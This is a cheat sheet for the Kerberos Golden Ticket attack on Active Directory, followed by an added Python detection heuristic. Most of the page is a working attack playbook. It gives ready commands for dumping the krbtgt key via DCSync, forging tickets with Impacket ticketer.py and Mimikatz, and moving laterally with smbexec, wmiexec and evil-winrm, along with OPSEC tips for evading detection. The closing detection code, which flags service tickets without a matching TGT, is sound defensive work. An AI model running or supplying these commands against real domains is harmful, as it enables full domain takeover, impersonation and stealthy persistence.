Golden Ticket
Forge a TGT offline using the krbtgt key; then use it to request any service ticket in the domain.
When to use
- You have the krbtgt NTLM or AES key (e.g., via DCSync).
- You know the Domain SID and a user to impersonate (and optional group SIDs).
Quick helpers
- Get Domain SID:
rpcclient -U '<domain>/<user>%<pass>' <dc> -c 'lsaquery'
- DCSync krbtgt (example):
secretsdump.py -just-dc-user krbtgt <domain>/<user>:'<pass>'@<dc_fqdn>
Linux (Impacket)
1) Generate ticket
ticketer.py -nthash <KRBTGT_NT> -domain <DOMAIN.FQDN> -domain-sid <S-1-5-21-...> -user-id <RID> -groups 512,513,518,519 <UserToImpersonate>
(Or with the AES key)
ticketer.py -aesKey <AES256_HEX> -domain <DOMAIN.FQDN> -domain-sid <S-1-5-21-...> -user-id <RID> -groups 512,513,518,519 <UserToImpersonate>
2) Load ticket & verify
export KRB5CCNAME=<UserToImpersonate>.ccache && klist
3) Use the ticket (request TGS + access)
KRB5CCNAME=<User>.ccache smbexec.py -k -no-pass <DOMAIN>/<User>@<host.fqdn>
KRB5CCNAME=<User>.ccache wmiexec.py -k -no-pass <DOMAIN>/<User>@<host.fqdn>
KRB5CCNAME=<User>.ccache evil-winrm -i <host.fqdn> -r <DOMAIN.FQDN>
Windows (Mimikatz)
1) Forge & inject
mimikatz # kerberos::golden /user:<UserToImpersonate> /domain:<DOMAIN.FQDN> /sid:<S-1-5-21-...> /krbtgt:<NT_hash> /id:<RID> /groups:512,513,518,519 /ptt
(Or with the AES key: replace /krbtgt:<NT_hash> with /aes256:<AES256_HEX>)
2) Verify
klist
3) Use
dir \\<host>\C$
Notes / OPSEC
- A golden ticket is a forged TGT: the KDC never issued it, so no 4768 is logged for it, but every service ticket you request with it still goes through the KDC and produces a 4769 on the DC.
- Use realistic lifetimes (ticketer.py -duration <days>); avoid decade-long defaults.
- AES keys are preferred on modern domains; NTLM works but is noisier.
- Changing krbtgt keys invalidates existing golden tickets.
- Choose a real user with expected group memberships to reduce PAC anomalies.
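A detection heuristic built on the two notes above (a forged TGT yields 4769s with no matching 4768, and NT-hash-based tickets are noisier), written as an added example that is not part of the original page; the events, their field names and the hosts are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of DC Kerberos events (4768 = TGT issued, 4769 = service
# ticket requested). Field names are assumed for the example, not a real export.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-05-01T08:00:00", "user": "alice", "ip": "10.0.0.5",
     "etype": "0x12", "service": "krbtgt"},
    {"id": 4769, "time": "2024-05-01T08:00:05", "user": "alice", "ip": "10.0.0.5",
     "etype": "0x12", "service": "cifs/fs01"},
    # Two TGS requests with no TGT ever issued by this KDC for bob from that host,
    # and RC4 ticket encryption: the trace a forged TGT built from an NT hash leaves.
    {"id": 4769, "time": "2024-05-01T09:30:00", "user": "bob", "ip": "10.0.0.77",
     "etype": "0x17", "service": "cifs/dc01"},
    {"id": 4769, "time": "2024-05-01T09:30:02", "user": "bob", "ip": "10.0.0.77",
     "etype": "0x17", "service": "host/dc01"},
]

RC4_ETYPES = {"0x17", "0x18"}      # RC4-HMAC ticket encryption; AES is 0x11/0x12
TGT_WINDOW = timedelta(hours=10)   # default "Maximum lifetime for user ticket"


def find_orphan_tgs(events, window=TGT_WINDOW):
    """Return the 4769 events whose (user, source ip) has no 4768 within `window`
    before them, with the reasons attached. The 4768s of every DC in the domain
    must be merged into `events` first, or TGTs issued by another KDC will fire."""
    tgt_times = defaultdict(list)
    for e in events:
        if e["id"] == 4768:
            tgt_times[(e["user"].lower(), e["ip"])].append(datetime.fromisoformat(e["time"]))
    findings = []
    for e in events:
        if e["id"] != 4769:
            continue
        t = datetime.fromisoformat(e["time"])
        issued = tgt_times[(e["user"].lower(), e["ip"])]
        if any(timedelta(0) <= t - i <= window for i in issued):
            continue                                   # a real TGT explains this TGS
        reasons = ["4769 with no 4768 for this user/ip in the window"]
        if e["etype"] in RC4_ETYPES:
            reasons.append("RC4 ticket encryption; noisy on an AES domain")
        findings.append({**e, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_orphan_tgs(SAMPLE_EVENTS):
        print(f["time"], f["user"], f["ip"], f["service"], "|", "; ".join(f["reasons"]))
```

Rotating the krbtgt key twice, as the notes say, invalidates any forged TGT; this check is for spotting its use before that happens.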